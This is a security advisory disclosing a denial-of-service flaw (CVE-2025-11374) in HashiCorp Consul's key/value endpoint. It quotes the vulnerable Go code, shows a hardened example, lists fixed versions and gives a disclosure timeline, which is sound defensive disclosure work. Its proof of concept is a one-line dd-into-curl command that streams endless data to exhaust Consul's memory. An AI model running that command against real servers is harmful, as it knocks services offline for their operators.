HashiCorp Consul <= 1.21.5 KVS Denial of Service
Nov 2, 2025 · By Julien Ahrens
ADVISORY INFORMATION
Product: HashiCorp Consul
Vendor URL: https://developer.hashicorp.com/consul
CWE: Memory Allocation with Excessive Size Value [CWE-789]
Date found: 2025-09-19
Date published: 2025-11-02
CVSSv4 Score: 7.1 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)
CVE: CVE-2025-11374
VERSIONS AFFECTED
Consul Community Edition <= 1.21.5
Consul Enterprise <= 1.21.5, 1.20.7, 1.19.9 and 1.18.11
INTRODUCTION
Consul is a service networking solution that enables teams to manage secure network connectivity between services, across on-prem, hybrid cloud, and multi-cloud environments and runtimes. Consul offers service discovery, service mesh, identity-based authorization, L7 traffic management, and secure service-to-service encryption.
(from the vendor’s homepage)
VULNERABILITY DETAILS
Consul’s key/value endpoint (“/v1/kv/test/key” in the proof of concept below) is vulnerable to a denial of service condition. When a client sends a PUT request to the KV endpoint without a Content-Length header, Consul’s request-handling logic skips the size validation performed in agent/kvs_endpoint.go. The code path then streams the request body directly into an in-memory buffer:

	// Check the content-length
	// (a body sent without a Content-Length header arrives with
	// req.ContentLength == -1, so this comparison never triggers for it)
	if req.ContentLength > int64(s.agent.config.KVMaxValueSize) {
		return nil, HTTPError{
			StatusCode: http.StatusRequestEntityTooLarge,
			Reason: fmt.Sprintf("Request body(%d bytes) too large, max size: %d bytes. See %s.",
				req.ContentLength, s.agent.config.KVMaxValueSize, "https://developer.hashicorp.com/docs/agent/config/config-files#kv_max_value_size"),
		}
	}

	// Copy the value
	// (unbounded: io.Copy keeps growing buf until the body ends)
	buf := bytes.NewBuffer(nil)
	if _, err := io.Copy(buf, req.Body); err != nil {
		return nil, err
	}
Because the size check is gated on the presence of Content-Length, an attacker can craft a request with an arbitrarily large payload (or a streaming body) while omitting the header. Consul will allocate a buffer proportional to the incoming data, eventually exhausting the process’s memory and causing Consul to crash or become unresponsive.
Successful exploits can allow an authenticated attacker to crash the Consul service.
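To make the gap concrete, here is an added example (not Consul’s code and not the vendor’s fix): a handler fragment that reproduces the pattern above next to a hardened form that bounds the read itself with http.MaxBytesReader, so the limit holds whether or not the client declared a Content-Length. maxValueSize stands in for KVMaxValueSize and its value is assumed; newStreamedPUT builds the request shape the proof of concept produces once it reaches the handler (ContentLength == -1).

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"io"
	"net/http"
	"strings"
)

// Stand-in for s.agent.config.KVMaxValueSize; the value is assumed for this example.
const maxValueSize int64 = 512 * 1024

var errTooLarge = errors.New("request body too large")
// readValueVulnerable reproduces the pattern quoted in the advisory: a body sent without
// Content-Length has req.ContentLength == -1, so the check never fires and io.Copy then
// grows the buffer for as long as the client keeps sending.
func readValueVulnerable(req *http.Request) ([]byte, error) {
	if req.ContentLength > maxValueSize {
		return nil, errTooLarge
	}
	buf := bytes.NewBuffer(nil)
	if _, err := io.Copy(buf, req.Body); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// readValueHardened keeps the cheap early rejection but also bounds the read itself:
// http.MaxBytesReader fails once more than maxValueSize bytes have arrived, whether or
// not the client declared a length, so the buffer can never grow past the limit.
func readValueHardened(w http.ResponseWriter, req *http.Request) ([]byte, error) {
	if req.ContentLength > maxValueSize {
		return nil, errTooLarge
	}
	buf := bytes.NewBuffer(nil)
	if _, err := io.Copy(buf, http.MaxBytesReader(w, req.Body, maxValueSize)); err != nil {
		return nil, fmt.Errorf("%w: %v", errTooLarge, err)
	}
	return buf.Bytes(), nil
}

// newStreamedPUT is what the advisory's PoC looks like once it reaches the handler:
// a body of size bytes and ContentLength == -1, i.e. no Content-Length header.
func newStreamedPUT(size int) *http.Request {
	body := io.NopCloser(strings.NewReader(strings.Repeat("A", size)))
	return &http.Request{Method: http.MethodPut, ContentLength: -1, Body: body}
}
```

A real handler passes its own ResponseWriter to http.MaxBytesReader, which lets the server close the connection once the limit is hit; the early Content-Length check stays useful as a cheap rejection of a declared oversize.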
PROOF OF CONCEPT
dd if=/dev/urandom | curl --http1.1 -X PUT -T - http://[address]:8500/v1/kv/test/key
SOLUTION
Update Consul Community to version 1.22.0
Update Consul Enterprise to 1.22.0, 1.21.6, 1.20.8 or 1.18.12
REPORT TIMELINE
- 2025-09-19: Discovery of the vulnerability
- 2025-09-19: Contacted the vendor via their security@ address
- 2025-09-22: Vendor sends initial response
- 2025-09-24: Vendor confirms the vulnerability
- 2025-10-06: RCE Security asks for the estimated patch date
- 2025-10-06: Vendor responds stating they want to ship fixes in the 1.22.0 release
- 2025-10-06: Vendor (CNA) assigns CVE-2025-11374
- 2025-10-15: Vendor sends another update stating the release is planned for 27th Oct
- 2025-10-27: Vendor publishes updates that fix the vulnerability
- 2025-11-02: Full Disclosure